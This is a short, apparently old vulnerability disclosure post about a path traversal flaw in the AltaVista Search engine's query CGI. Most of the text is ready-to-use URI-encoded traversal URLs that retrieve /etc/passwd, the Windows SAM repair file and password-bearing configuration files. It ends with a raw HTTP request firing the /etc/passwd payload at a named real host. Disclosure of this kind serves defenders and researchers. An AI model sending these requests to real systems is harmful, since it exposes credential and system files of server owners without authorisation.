AltaVista Search Engine on Linux, *BSD, Unix
Input validation error
Unauthorized file access
Packetstorm
hola, more bugs in the AV-Search thing .. using uri-encoded strings it is possible to view "any" file on the system .. examples: unixxxsss ... http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd or on an micro$oft IIS ... http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._ interesting infos about the file structure ... http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log or another file which does contain the password .. http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf altavista told me that this is(was) just a flavour of the "old" bug and its fix is(was) included in the last secpatch. whatever .... nicedays :-/ RC rudicarell@hotmail.com
GET /cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd HTTP/1.1 Host: www.i-pi.com User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4.1) Gecko/20031114 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive